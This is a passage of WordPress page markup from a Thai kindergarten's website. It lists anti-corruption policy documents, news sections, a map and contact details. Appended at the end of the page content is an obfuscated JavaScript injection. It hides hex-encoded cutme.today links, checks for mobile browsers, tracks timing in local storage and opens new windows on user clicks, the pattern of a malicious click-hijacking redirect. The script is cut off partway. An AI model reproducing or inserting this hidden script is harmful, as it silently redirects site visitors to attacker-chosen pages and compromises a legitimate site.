900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const 